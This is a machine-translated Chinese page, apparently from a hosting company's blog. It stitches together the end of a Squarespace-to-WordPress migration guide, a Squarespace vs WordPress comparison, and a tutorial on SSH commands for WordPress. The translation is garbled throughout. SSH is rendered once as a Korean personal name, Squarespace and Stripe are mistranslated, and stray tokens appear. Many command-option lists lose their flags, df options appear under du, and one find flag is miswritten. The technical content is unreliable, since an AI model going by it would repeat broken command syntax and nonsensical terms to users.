如果你想尝试新的造型,现在是最好的时机。你可以选择任何你想选择的主题,WordPress 会让你的内容适应它。许多高级 WordPress 主题带有高级功能,如强大的页面生成器和完全响应的设计。
WordPress 还让你可以使用直观的块编辑器,使你能够使用可视界面编辑任何页面或帖子的布局和风格。无论你是选择复制旧网站的设计还是重新开始,WordPress 都能为你提供比 Squarespace 更好的体验。
如果你不确定从哪里开始,我们有一个精选的清单,列出了你在 2021 年可以使用的最好的主题。这个列表包括了你能想到的几乎所有类型的网站的选项,所以去看看吧。
T3】
从 Squarespace 迁移到 WordPress 后要做什么
如果你来自 Squarespace,WordPress 为你打开了一个无限可能的世界。最激动人心的变化是你现在可以访问插件了。
Squarespace 为其用户提供了一个广泛的扩展库。然而,一旦你安装了 WordPress,这个功能与众多可用选项相比就相形见绌了。给你一个概念,WordPress.org 插件库有近 60,000 个插件(全部免费):
WordPress 插件库。
如果你能想象出一个特性,很有可能会有一个插件(就像自动上传图片一样)。许多 WordPress 新用户最终会花费数小时或数天来尝试新工具,所以这里有一个快速链接,链接到你应该试用的最佳插件列表。
不要让 Squarespace 的限制阻碍你的网站🙅♀️从这个指南中学习如何安全地将你的内容转移到 WordPress💪
摘要
如果你要开始你的第一个网站,Squarespace 是一个合适的选择。然而,WordPress 是世界上最受欢迎的 CMS(40%的网站使用它)是有原因的,那是由于它的灵活性。
WordPress 致力于让你创建任何你想要的网站,以任何你能想象的风格,以任何你需要的功能。从 Squarespace 迁移到 WordPress 只需要几个小时,但你将在未来几年收获回报。
关于如何从 Squarespace 迁移到 WordPress,你有什么问题吗?下面评论区来说说吧!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
Squarespace 和 WordPress——哪个更好?(赞成和反对)
虽然 WordPress 是迄今为止世界上最受欢迎的内容管理系统,但这并不意味着它是制作网站的唯一方式。近年来,我们已经看到了像 Squarespace 和 Wix 这样的初学者友好型网站建设者的崛起。在本帖中,我们将前者 Squarespace 与 WordPress 进行比较,后者是为全球 43.3%的网站提供支持的内容管理系统。
我们将会给你一个 Squarespace 和 WordPress 的详细对比,并向你展示两者的优势。最后,你应该掌握了选择适合你的网站的平台所需的所有知识。
Squarespace vs WordPress:快速概览
在深入研究 Squarespace 和 WordPress 之前,我们想给你一个关于每种工具构建网站方法的快速概述。此概述将有助于更具体功能的讨论。这个想法有点过于简单——但总的来说,每个平台都在试图平衡两种对立的力量:
- 易用性和对初学者的可及性
- 定制站点和添加附加功能的灵活性
虽然与许多其他内容管理系统相比,WordPress 仍然易于使用,但它牺牲了一些初学者友好性,以便让您对网站的外观和功能有更高程度的控制。另一方面,Squarespace 试图让事情变得尽可能容易和简单……但却牺牲了灵活性。
还有其他哲学上的差异——比如开源(WordPress)和闭源(Squarespace)之间的差异。但是对于大多数临时用户来说,易用性和灵活性之间的动态性是最重要的。下面,我们将深入探讨这种差异是如何发生的一些具体实例。
在各个平台上建立一个网站有多容易?
如果你正在寻找建立一个基本网站的绝对最简单的方法——Squarespace 赢了。Squarespace 可能没有那么灵活(稍后会有更多介绍!),但没人能否认它让创建一个基本网站变得尽可能轻松。话虽如此,WordPress 仍然让建立网站变得很容易。这并不像《T4》中的 Squarespace 那么简单。
方形空间
有了 Squarespace ,你无需担心注册托管或购买域名的问题。相反,你只需注册一个 Squarespace 账户。然后,在几秒钟内,你已经为你的网站选择了一个模板:
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
Choosing a Squarespace template
一旦你回答了几个更简单的问题,你就已经有了一个可以工作的网站——你所需要做的就是定制文本和图片(稍后会有更多的!):
*
The Squarespace interface
整个过程可能只需要一分钟。
WordPress
与 Squarespace 不同,你需要注册自己的虚拟主机并购买一个域名来开始使用。然后,一旦你有了主机,你需要安装实际的 WordPress 软件才能继续。虽然这听起来有点吓人,但是现在大多数主机都让你点击一下就可以安装 WordPress。有些,像 Kinsta,甚至预装了WordPress。
因此,虽然这里有一个额外的步骤——这是初学者肯定可以处理的事情,它实际上只延长了 5-10 分钟的创建过程。一旦你安装了 WordPress,你就有了一个基本的工作网站。像 Squarespace 一样,你可以通过安装一个 WordPress 主题 ( 大致相当于 Squarespace 的模板)来改变你网站的外观。
How to add a WordPress theme
根据从获取主题的,这个过程可能比选择 Squarespace 模板稍微复杂一点。不过还是那句话,大部分初学者都不会有问题。看看这 7 个*流行的网络商务主题,让你开始运作。
*
你对网站的功能有多少控制力?
得益于其庞大的第三方插件和主题库, WordPress 在控制深度和功能性方面是明显的赢家。WordPress 有数以万计的插件来增加功能,然而,使用 Squarespace,你会受到 Squarespace 所支持的集成的限制。
方形空间
有了 Squarespace,您可以在一个界面上进行更改。在此界面中,您可以:
- 更改内容
- 调整设计样式
- 添加自定义 CSS
- 设置分析
- 选择要显示的社交分享按钮
- 控制页面的基本 SEO 设置
您甚至可以使用基于内容块的拖放界面来创建自己的设计:
Building a page with Squarespace drag and drop editor
你实际上比许多 WordPress 粉丝给 Squarespace 的评价更有控制力…
但是,话虽如此,你仍然无法控制 WordPress。这是因为 Squarespace 缺少一个关键要素——第三方插件。
WordPress
当涉及到改变你的网站时,WordPress 拥有 Squarespace 拥有的一切… 再加上一个捆绑包。看,WordPress 有成千上万的插件,你可以添加到你的网站来增强它的功能。
例如,假设您喜欢 Squarespace 的页面设计器让您通过拖放来构建设计。为了在 WordPress 上获得同样的功能,你需要做的就是安装众多优质页面生成器插件中的一个:
Example of a WordPress page builder
想加社交分享按钮?安装一个插件。需要帮助管理广告?简单——安装一个插件。因为 WordPress 社区是如此的庞大,你可以找到几乎所有东西的插件…这意味着你可以给你的网站添加几乎任何功能。
再说一次——增加灵活性的代价是事情不太适合初学者。你需要为你可能想要的许多特性寻找插件,而不是把所有的东西都放在一个界面上。但是对于大多数人来说,为了功能和灵活性的巨大收益,这种权衡是绝对值得的。
T3】
每个平台如何处理电子商务?
虽然电子商务可能不是每个人都要考虑的,但是如果你打算通过你的网站销售产品,如果你使用 WordPress ,你会有更多的灵活性。
方形空间
Squarespace eCommerce
Squarespace 支持电子商务。但与 WordPress 相比,它相当有限。除了一般的电子商务功能,Squarespace 的一个亮点是它包括内置的购物车恢复电子邮件。这当然可以从你的 WordPress 电子商务商店获得,但是它需要一个第三方插件。
但尽管如此,在 Squarespace 和电子商务方面,你仍然受到限制。首先,您只能从三个支付网关中选择:
- 种类
- 贝宝
- Apple Pay
与 WordPress 的支付网关相比,这只是一个很小的列表。其次,你又错过了 WordPress 庞大的插件生态系统。有大量专注于电子商务的插件,所以你失去了大量的功能。
最后,还有一个巨大的不利因素,除非你升级到更昂贵的电子商务计划(每月 30 美元起), Squarespace 除了信用卡手续费之外,还收取 2-3%的交易费 。因此,如果你想在 Squarespace 上经营一家电子商务商店,并避免交易费用,你每年的最低费用是 312 美元。
WordPress
有许多不同的插件可以把 WordPress 变成一个功能齐全的电子商务商店。最受欢迎的两个是:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
- woo commerce——针对实体产品(虽然你也可以用它来销售虚拟产品)。
- 轻松的数字下载-专注于帮助您销售数字产品。
WooCommerce welcome screen
除了这些基本的电子商务插件,你可以添加大量的附加插件来增加你的商店的功能。而且你永远也不会支付任何交易费用(超过你的支付处理器收费)。此外,你甚至可以找到插件来为你的商店创建更高级的功能,如代销商网络。
每个平台上谁控制着你的数据?
我们所说的“控制”本质上是指—如果您想迁移到一个新的平台,那么移动您的内容有多容易?如果你关心数据所有权和可输出性(你应该是), WordPress 是明显的赢家,因为它是开源的,你总是能控制你的网站。
建议阅读:如何导出一个 WordPress 站点。
方形空间
Squarespace 允许您将部分内容导出到. xml 文件中。您可以导出的内容是:
- 普通页面
- 图库页面
- 一个博客页面及其所有帖子
- 文本块
- 图像块
- 来自嵌入块、Twitter 块和 Instagram 块等其他块的文本将以最小结构导出。
- 评论
但是有一大堆内容不能导出,包括:
- 产品页面
- 文件夹
- 索引页面
- 活动页面
- 相册页面
- 封面
- 不止一个博客页面
- 音频块
- 视频块
- 产品块
- 草稿
- 风格变化
- 自定义 CSS
此外,你永远也不能下载你的数据库或服务器文件的完整副本。这很重要,因为这意味着你永远不会真正“拥有”你的整个网站。
WordPress
有了 WordPress,你拥有所有文件和数据的 100%所有权。除了 WordPress 的内置工具帮助你以一种与其他流行的内容管理系统兼容的格式导出用户和数据,你还可以随时下载你的数据库和文件的完整副本。这都是你的,其他任何人都无权使用。
每个平台如何处理日常维护?
因为 Squarespace 是一个封闭的生态系统,所以你根本不需要担心维护问题。另一方面,因为 WordPress 是一个开放的生态系统,你需要采取更积极的方法来维护你的网站。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
方形空间
有了 Squarespace,你就不需要担心更新或维护之类的细节问题。Squarespace 为您处理所有这些,这使它变得非常简单。也就是说,当涉及到一些基本的维护功能(如备份)时,Squarespace 会让您陷入困境。它似乎没有提供任何方法来备份你的整个站点,这是一个相当大的疏忽。
WordPress
使用 WordPress,您负责处理:
- 更新(软件和插件/主题)
- 备份
- 安全性
这看起来令人生畏——但是大部分都很简单,可以通过插件自动完成。例如,你可以找到为你保护安全的插件。
Example of a WordPress security plugin
另外,如果你选择一个托管的 WordPress 主机,你的主机会为你处理很多细节。或者,你可以雇佣一个 WordPress 维护服务。
每个平台多少钱?
Squarespace 的定价更简单,但这并不意味着它更便宜。不幸的是,我们无法给出哪个更便宜的单一声明——实际的答案取决于你选择哪个 Squarespace 计划以及你对你的 WordPress 站点做出的决定。
方形空间
Squarespace 有明确的定价计划,这让你很容易知道你会在你的网站上花多少钱。最便宜的计划每年 96 美元(或每月 16 美元)起,最贵的电子商务计划每年 480 美元(或每月 46 美元):
Squarespace pricing
请记住,如果你想创建一个电子商务商店,最便宜的 Squarespace 计划会将你的页面限制在 20 页以内,并收取额外的交易费。
WordPress
有了 WordPress,就很难确定一个确切的成本。WordPress 网站唯一不可避免的成本是你所支付的费用:
- 主办;主持
- 你的领域
如果你愿意使用廉价的共享主机,那可能只需要你每年花费大约 50 美元。另一方面,面向性能的托管 WordPress hosting 每月可以运行数百个。除此之外,你可能想花额外的钱购买优质的第三方主题和插件。你不需要去。但是高级主题和插件通常提供更好的功能。
从 Squarespace 迁移到 WordPress
如果你目前正在使用 Squarespace,并且正在寻找一种简单的方法来将迁移到 WordPress ,我们推荐你去看看wordheld。他们是 Kinsta 的官方合作伙伴,提供全方位的网站迁移服务,将数据从任何 CMS (Squarespace)平台转移到 WordPress 。
T2】WordHerd 处理从小型企业到大型企业的各种规模的迁移。除了 CMS 迁移之外,WordHerd 团队也非常擅长协助 CRM 数据迁移。
以下是其他几种可选的迁移方法:
- Squarespace 提供了一种从他们的平台导出内容的方法。查看如何导出你的 Squarespace 网站。
- CMS2CMS 提供了一个高级迁移解决方案,将你所有的数据从 Squarespace 转移到 WordPress。
推荐阅读:Weebly vs WordPress——哪个最适合你的网站?
Squarespace vs WordPress:你该选哪个?
如果你只想尽可能容易地创建一个简单的网站,而不在乎灵活性或内容所有权,Squarespace 是一个可靠的选择。这样对有好处。但是绝大多数站长更适合使用 WordPress。是的,WordPress 的开放性需要稍微高一点的学习曲线,以及对安全性、性能和维护的高度关注。
但是 WordPress 的核心团队和社区在将 WordPress 变成初学者的无障碍工具方面取得了巨大的进步。仅仅因为 Squarespace 比 T2 容易,并不意味着 WordPress 没有 T4 容易。总而言之,当你使用 WordPress 时,你将拥有更多:
- 功能
- 灵活性
- 所有权
你甚至还可以省钱!你怎么想呢?你觉得 Squarespace 和 WordPress 谁更厉害?请在评论中告诉我们。
Squarespace 是 Squarespace 的注册商标。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。*
WordPress 用户 2022 年开始使用的 27 个流行 SSH 命令
使用 SSH 和 WordPress 可能是访问你的网站最安全和方便的方法之一。
这是一个访问你网站上文件的协议,意思是“安全外壳”。只要您有登录凭证,您就可以使用它从任何地方访问您的站点,因为您知道这样做是安全的。
在这篇文章中,你将了解一些用于 WordPress 的最有用的 SSH 命令。
让我们开始吧!
什么是 SSH,我如何在 WordPress 中使用它?
SSH 是访问 WordPress 站点文件的安全协议。这篇文章关注的是你可以使用的命令,所以我不打算详细讲述如何使用 SSH 访问你的站点。
什么是宋承宪?
SSH,或“安全外壳”,是一种可以用来访问远程服务器上的文件和目录的协议。SSH 规范将其定义为:
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
"在不安全的网络上安全远程登录和其他安全网络服务的协议."
你可以使用终端(在 macOS 或 Linux 上)或客户端如 PuTTY (在 Windows 上)通过 SSH 访问你的网站,而不是使用你的网络浏览器。
我如何在 WordPress 中使用 SSH?
对于一个 WordPress 站点,SSH 将允许你访问 WordPress 文件本身以及你添加到 wp-content 目录的任何文件,无论是通过管理界面还是直接。
很可能你将主要在 wp-content 目录中使用它,偶尔在根目录中使用它来访问像wp-config.php这样的文件。
要使用 SSH 在您的站点中工作,请打开终端或客户机(如 PuTTY ),并从访问服务器开始。为此,你需要四条信息:
- 服务器地址。
- 用户名。
- 密码。
- 港口。
为了通过 SSH 与 Kinsta 连接,您需要在 MyKinsta 中找到该信息。选择您的站点并找到信息屏幕的 SFTP/SSH 部分。
MyKinsta SSH details
将它复制到命令行中。
Kinsta SSH starting screen
一旦你完成了这些,你就可以开始在你的 WordPress 站点上使用 SSH 命令了。
如果您的连接被拒绝,可能是由于以下原因之一。按照我们的指南对拒绝的 SSH 连接进行故障排除以再次连接。
T3】
什么是 PuTTY,我如何使用它?
如果你运行的是 macOS 或 Linux,你已经有了通过 SSH 访问你的 WordPress 站点所需的界面。您可以简单地使用内置终端来使用 SSH。
但是如果你用的是 Windows,你需要安装一个客户端来使用 SSH。
最流行的 SSH 客户端是 PuTTY 。您需要下载并安装该软件,然后才能从 Windows 访问您的网站。然后,在 PuTTY 中使用与在终端中相同的 SSH 命令。
我如何用 WordPress 自动化 SSH 命令?
使用 SSH 访问你的 WordPress 站点的一个好处是你可以自动化你经常使用的命令。
你可以通过使用 WordPress 命令行界面 WP-CLI 来实现。这是一个让你访问特定于 WordPress 的命令库的接口,你可以在 SSH 提供的基础上使用它。
使用 WP-CLI 意味着你可以自动化 WordPress 管理任务,比如更新你的 WordPress 安装,安装插件,以及配置远程服务器。使用命令行加速这个过程,可以让你成为一个更有效率的开发者。
在 WordPress 中使用 SSH 的好处
在 WordPress 中使用 SSH 有很多好处:
- 很安全。这意味着您可以从任何地方远程访问您的服务器,因为您知道您是通过一个安全的界面这样做的。
- 很方便。它能让你从任何地方进入。你不需要进入 WordPress 管理界面,甚至不需要运行网络浏览器。
- 它很快。在很多情况下,使用 SSH 命令比使用 WordPress 管理屏幕或者通过 SFTP 访问文件要快得多。
现在你已经知道了 SSH 是什么,以及它是如何与 WordPress 一起工作的,让我们来看看你可以与 WordPress 一起使用的最流行的 SSH 命令。
27 个用于 WordPress 的 SSH 命令
SSH 协议有广泛的命令。下面我列出了最常用的,为了方便起见,我把它们分成了几类。
目录命令
在你的 WordPress 站点中,有一系列的 SSH 命令可以用来操作目录(或文件夹)。
pwd–显示当前目录(您现在所在位置的完整路径)
pwd命令将显示您现在所在服务器的完整路径。如果你在第一次访问你的网站时输入这个,它会告诉你你在哪个服务器上。
pwd command
在进一步移动到您的文件夹后使用此命令,您将会看到关于您确切位置的更多信息。这对于检查你的位置很有用,因为你没有使用代码编辑器或 FTP 客户端时得到的可视化表示。
ls–显示目录内容(列出文件名)
ls命令将显示当前目录的内容。
ls command
您也可以使用附加参数来定制或添加到ls命令返回的信息中:
ls -a显示隐藏文件。ls -l显示目录内容的文件详细信息,例如,权限、所有权、日期等。- 列出文件的大小,以块为单位。
- 以人类可读的形式显示尺寸。
确保在命令和任何参数之间键入一个空格。
ls -a command
CD–更改目录
cd命令将让你移动到另一个目录。您可以移动到当前目录的子目录中,也可以使用正确的参数向上或向下移动。
以下命令将我从服务器的根目录带到公共目录:
cd public
要在目录树中向上移动或返回起点,请使用以下参数之一:
cd ..转到您当前位置的上一级目录。- 将你移到你正上方文件夹内的另一个文件夹。
cd–转到上一个目录。cd /带你到根目录。
在下面的截图中,我已经移动到公共目录并列出其内容。如果你有使用 WordPress 安装内容的经验,你会觉得很熟悉:
Moving into the public directory
mkdir–创建新目录
使用mkdir命令,可以在当前目录下创建一个新目录。
所以,如果你在一个插件的文件夹中,你想为样式表添加一个目录,你可以使用这个命令:
mkdir styles
这将在您当前所在的文件夹中添加一个新的空目录。如果您想将目录添加到结构中较低的文件夹中,请键入结构。因此,在 wp-content 文件夹中,您可以键入:
mkdir /plugins/myplugin/styles
rmdir–删除目录
rmdir命令将删除服务器上的一个目录。小心使用,因为你不能撤销它!
与mkdir一样,您可以使用rmdir删除当前位置的目录:
rmdir styles
或者,您可以使用rmdir来删除结构中更下面的文件夹:
rmdir /plugins/myplugin/styles
如果您添加额外的参数,您也可以使用rm删除目录。
rm * foldername–删除目录中的所有文件或内容。rm -r foldername–删除文件夹以及其中的文件夹。
文件或目录命令
以下命令可以用于文件或文件夹/目录。
CP–复制文件或文件夹
您可以使用cp命令将文件和文件夹复制到另一个位置。您需要指定要将文件或文件夹复制到的位置。
cp filename.extension /dir/
这指定了要复制的文件的名称(包括其扩展名)以及要复制到的位置。
如果您想要重命名文件(即新版本与原始版本的名称不同),那么您也可以指定新的文件名。
cp filename.extension /dir/filename.extension
该命令有许多您可以使用的参数:
- 复制文件夹中的所有内容。
cp -f如果已经有另一个同名文件,则删除目标文件,并用新文件覆盖它。- 复印前给你一个警告信息。
cp -u仅当文件内容不同时,覆盖目标文件夹中的文件。- 首先检查文件是否已经存在,如果已经存在,则不会复制。它不会覆盖文件。
cp -a归档原始文件。
移动文件或文件夹
除了复制文件和文件夹,你还可以移动它们。为此,使用mv命令。
与cp一样,您可以移动文件或文件夹并保持相同的名称,或者移动并重命名它。
- 移动文件并保持相同的名称。
mv filename.extension /dir/filename1.extension移动并重命名文件。- 将文件上移一个文件夹。
压缩文件或文件夹
另一个可以用于文件夹或文件的命令是zip,可以用来压缩文件夹及其内容。您需要包括将被压缩为 zip 文件的文件/文件夹的名称。您可以将它与指定是否要删除原始文件夹的参数一起使用。
zip -r filename.zip foldername压缩文件夹,但不删除它。- 压缩并删除文件夹,只留下文件夹的压缩版本。
- 从您指定的现有 zip 存档中删除文件。
zip -u filename.zip foldername更新现有 zip 存档中的文件:如果您已经更新了原始文件,并且不想删除 zip 文件并创建一个新文件,这很有用。
zip -r command
当您列出文件夹的内容时,如果您使用了zip -r,您将看到 zip 文件和原始文件夹,但是如果您使用了zip -m,则只会看到新的 zip 文件。
The new zip file
解压缩–解压缩文件夹
unzip 命令将解压您目录中的压缩文件,并提取其内容以创建最初压缩的文件夹或文件:
unzip twentyseventeen.zip
如果压缩时没有删除原始文件夹,请不要使用此选项。它不会覆盖原始文件夹。相反,在压缩时使用zip -m删除原始文件夹,或者在解压缩 zip 文件之前使用rm删除它。
您还可以添加解压缩参数来定制其用途:
unzip filename.zip -x excludedfile.zip将排除一个文件,并防止它与其他文件一起解压缩。unzip filename1.zip filename2.zip filename3.zip将解压多个文件。你可以对任意多的 zip 文件使用它,这比在 FTP 客户端中使用要快得多。
tar——创建并解压缩压缩的归档文件
tar命令将允许您创建和解压缩. tar.gz 归档文件,这是使用。zip 存档。您可以使用相同的命令来压缩和解压缩文件或文件夹。
要压缩文件或文件夹,请使用tar cvzf。压缩文件夹的语法是:
tar cvzf archivename.tar.gz directoryname
上面,archivename是要创建的存档文件的名称,directoryname是要压缩的文件夹的名称。
并且要解压文件夹,使用tar xvzf:
tar xvzf archivename.tar.gz
这四个字母代表特定的说明:
- 告诉 tar 压缩文件。
- 告诉 tar 提取文件。
v代表 verbose,告诉 tar 显示受该命令影响的文件名。- 告诉 tar 解压缩归档文件。
- 告诉 tar 您正在提供档案的名称。
文件命令
下面列出了专门用于文件的最常见的 SSH 命令。
触摸–创建新文件
要在服务器上创建一个新的空文件,使用touch命令:
touch style.css
您只能在当前目录下创建一个文件,因此您必须在使用touch命令之前导航到该目录。
cat–显示文件内容
要显示文件的内容,使用cat。
cat command
这将显示终端或 PuTTY 中任何文件的完整内容。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
grep–搜索特定短语
如果您知道您需要检查的文件很长,并且您也知道您要查找的内容,您可以使用grep命令来搜索特定的内容。
下面我在 sidebar.php 文件的主题中搜索了单词“sidebar”。
grep command
这将显示包含搜索词的所有行。
如果我想搜索一个不止一个单词的字符串,我需要用语音标记将它括起来:
grep "nav class" footer.php
grep命令也有许多参数,您可以使用它们来定制您的搜索:
grep -i “string” filename在文件中搜索字符串,不区分大小写。grep -c “string” filename统计一个字符串在文件中出现的次数。grep -l “string” *列出包含字符串的文件。grep -n “string” filename显示行号和结果
head 读取文件的前 10 行
如果您只想读取文件的开始行,那么使用head命令:
head filename.extension
head command
tail 读取文件的最后 10 行
tail命令的工作方式与head命令相同,但读取的是文件的最后十行:
tail filename.extension
查找–搜索文件和目录
find命令允许您搜索文件和目录,并返回符合您指定标准的文件和目录。以下命令将在当前目录中搜索名称包含“index”的所有文件:
find . -name “index”
语法是:
find operator criterion string
您可以使用的运算符有:
/(斜线)搜索整个系统。.(点)搜索工作目录。~(波浪号)搜索主目录。
因此,如果您将上面的命令改为这样,str将搜索整个系统,而不仅仅是当前目录:
find / -name “index”
您可以使用的标准包括:
-name–文件名。-user–属于给定用户的文件。-size–给定大小的文件。-type -d–目录类型。即仅搜索目录。-type -f–文件类型,即仅搜索文件。
搜索词可以是您喜欢的任何字符串。一定要用引号括起来。
du–获取文件大小
如果你想知道你的 WordPress 安装中一个或多个文件的大小,使用du(磁盘使用)命令:
du -h wp-config.php
插入-h意味着磁盘使用量将以人类可读的格式显示,而不是以块的形式显示。
您可以使用额外的参数:
df -h将以人类可读的格式显示结果。df -m将以 MB 为单位显示结果。df -k将以 KB 为单位显示结果。df -T将在额外的一列中显示文件系统类型。df -ht /directoryname让您查看特定目录的信息。df help列出了您可以使用的其他选项及其说明。
chmod–更改文件的权限
chmod命令允许您更改文件的权限:
chmod 464 filename.extension
要确定使用哪些权限,使用 Unix 权限计算器并将它给出的数字复制到命令中。
nano–使用 Nano 文本编辑器编辑文件
如果您已经使用touch命令创建了一个新文件,或者使用cat命令显示了一个现有文件的内容,那么您可能想要编辑该文件。
您可以使用带有nano命令的 nano 文本编辑器来完成此操作:
需要为您的客户站点提供一个非常快速、安全且对开发人员友好的托管服务吗?Kinsta 是为 WordPress 开发者设计的,提供了大量的工具和强大的仪表板。查看我们的计划
nano filename.extension
nano text editor
这使您可以直接从命令行编辑文件。
当心:撤销你的工作比使用代码编辑器或版本控制系统要难得多。如果你有信心这样做的话,只做一些小的改变。
要浏览文件,请使用光标键和屏幕底部列出的键盘快捷键。要退出文件,使用 Ctrl-X 返回终端。
vim–用 Vim 文本编辑器编辑文件
vim 文本编辑器的工作方式与 nano 编辑器非常相似,你可以使用vim命令来访问它。您选择使用哪个将取决于个人偏好:
vim filename.extension
wget–下载文件
使用wget命令,您可以从互联网下载文件。它们将被下载到您当前所在的目录中。您需要包含要下载的文件的完整路径:
wget https://site.com/filename.ext
这将从 site.com 下载 filename.ext 文件,并将其存储在当前目录中。
终端命令
现在让我们来看看一些最常用的命令,以帮助您使用终端(或 PuTTY)界面。
清除–清除屏幕
如果你的屏幕感到混乱,只需输入clear来清除它,你会发现自己又回到了一个空白屏幕的顶部。如果您想要一个干净的工作环境,或者在公共场所想要隐藏您的工作,这很有用:
clear command
重置–从终端移除输出
reset命令将删除终端屏幕上的所有命令和输出,并清空屏幕。
历史记录–显示最近使用的 50 个命令
如果你不太确定你最近做了什么,并且想重复或撤销一些事情,使用history命令输出你最近使用的 50 个命令的列表。
history command
屏幕–恢复 SSH 会话
Screen 是一个终端多路复用器,或者是一个工具,可以让您用多个虚拟会话来扩展单个终端会话。使用 Screen,您可以在运行不同任务的不同“窗口”之间切换,而不必打开到服务器的两个 SSH 连接。
比如可以在一个窗口使用nano,切换到另一个窗口使用wget下载大文件。此外,在屏幕会话中工作允许您在由于 SSH 连接或网络错误而重新连接后继续您的任务。对于 WordPress 用户来说,Screen 对于安全运行长时间的任务很有用,比如数据库导入和 regex 搜索,以及用 wp-cli 替换进程。
让我们仔细看看如何使用 Linux 屏幕。
如何安装 Linux 屏幕
首先,您需要使用下面的命令来确保您的服务器上安装了 Screen。
screen --version
如果安装了 Screen,您会看到类似这样的内容。
[[email protected]](/cdn-cgi/l/email-protection):~$ screen --version
Screen version 4.03.01 (GNU) 28-Jun-15
否则,使用下面的命令安装屏幕。
Ubuntu 和 Debian
sudo apt update
sudo apt install screen
CentOS 和 Fedora
sudo yum install screen
Start a new Screen session in Linux.
虽然您的终端看起来与以前没有任何不同,但您现在正处于屏幕会话中!现在,让我们尝试在屏幕会话中创建新窗口。
A new Screen session.
在 Linux 屏幕中,所有快捷键都以Ctrl+A开头。要创建一个新窗口,按下Ctrl+A,放开,然后按下c。要查看两个窗口,按下Ctrl+A,然后按下”。
如何在屏幕窗口之间切换
下面的屏幕截图显示了两个窗口-0 和 1。在此窗口中,您可以使用箭头键在不同的窗口之间上下移动。在突出显示的窗口上按“Enter”或“Return”来选择它。如果知道具体窗口的编号,也可以用Ctrl+A和number来选择。
Two windows in Screen.
最后,您还可以使用下面的命令导航到下一个或上一个窗口。
- 下一个窗口—
Ctrl+A``n - 上一窗口—
Ctrl+A``p
如何退出屏幕会话
要退出屏幕会话,按Ctrl+D。终端将显示“[屏幕正在终止]”–这表示屏幕会话不再处于活动状态。
Terminate the Screen session.
如何管理多个 Linux 屏幕会话
Screen 最强大的特性之一是能够使用多个屏幕会话。例如,你可以在一个屏幕上运行数据库上的搜索和替换任务,一个屏幕用于浏览 WordPress 文件系统,另一个屏幕用于更新 wp-cli 中的插件。最重要的是,您可以根据需要分离和恢复屏幕会话。这意味着,即使失去了与服务器的连接,您也可以恢复漫长的数据库导入过程。
在我们继续之前,如果适用,使用Ctrl+D退出您现有的屏幕会话。终止屏幕会话后,使用下面的命令创建一个新会话。请注意该命令如何让您为会话设置唯一的名称。请随意用您喜欢的任何内容替换“会话 1”。
screen -S session1
创建新会话后,使用screen -ls命令列出所有活动屏幕会话。在下面的截图中,您可以看到由上面的命令创建的会话session1。
如何使用 Linux 屏幕
安装屏幕后,使用screen命令启动新的屏幕会话。你应该会看到一些介绍性的文字,比如下面的截图。按键盘上的“回车”或“回车键”完成屏幕初始化。
List Screen sessions in the terminal.
如何分离 Linux 屏幕
当您使用Ctrl+D退出屏幕会话时,它会完全终止会话。如果您想让会话在后台运行,而您在做其他事情,该怎么办?这就是分离的由来。当您分离屏幕会话时,它会继续在后台运行。分离对于在后台保持长时间运行的进程(如数据库导入和弹性搜索索引)非常有用。
要分离屏幕会话,只需按下Ctrl+A,然后按下d。如果你在分离后运行screen -ls,你会看到屏幕会话的“(分离)”参数。
A detached Screen session.
分离屏幕会话后,您可以创建另一个屏幕。
screen -S session2
Multiple Screen sessions.
如何恢复 Linux 屏幕
要恢复一个分离的 Linux 屏幕,使用下面的命令。请确保将“session1”替换为您要恢复的会话的名称。
screen -x session1
Resume a Linux screen.
在下面的屏幕截图中,您可以看到“会话 1”现在已附加,“会话 2”已分离。
屏幕是终端中多任务处理的强大工具。它允许您为不同的任务运行多个不同的环境,而不必建立多个 SSH 连接。如果你在你的 WordPress 站点上运行一个时间密集型的过程,我们推荐使用 Screen。
通过 SSH 工作时的其他有用命令
下面的命令不在上面的标题下,但是你可能会发现它们对通过 SSH 使用你的 WordPress 站点很有用。
netstat–显示网络连接
键入netstat命令,您将看到网络连接和状态的详细信息:
netstat command
退出–退出远程服务器
当你用你的远程 WordPress 站点完成工作后,键入exit命令退出服务器并返回到你的本地机器。
exit command
您应该在完成工作后一直这样做,这样其他人就不能通过 SSH 访问您的服务器。
摘要
能够通过 SSH 访问你的 WordPress 站点给了你一个安全和方便的方法来处理你站点上的文件,而不需要打开 FTP 客户端或者网络浏览器。
感谢这里列出的命令,你应该能够通过 SSH 完成你需要在 WordPress 中完成的大部分任务,并且更快地完成更多的工作。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
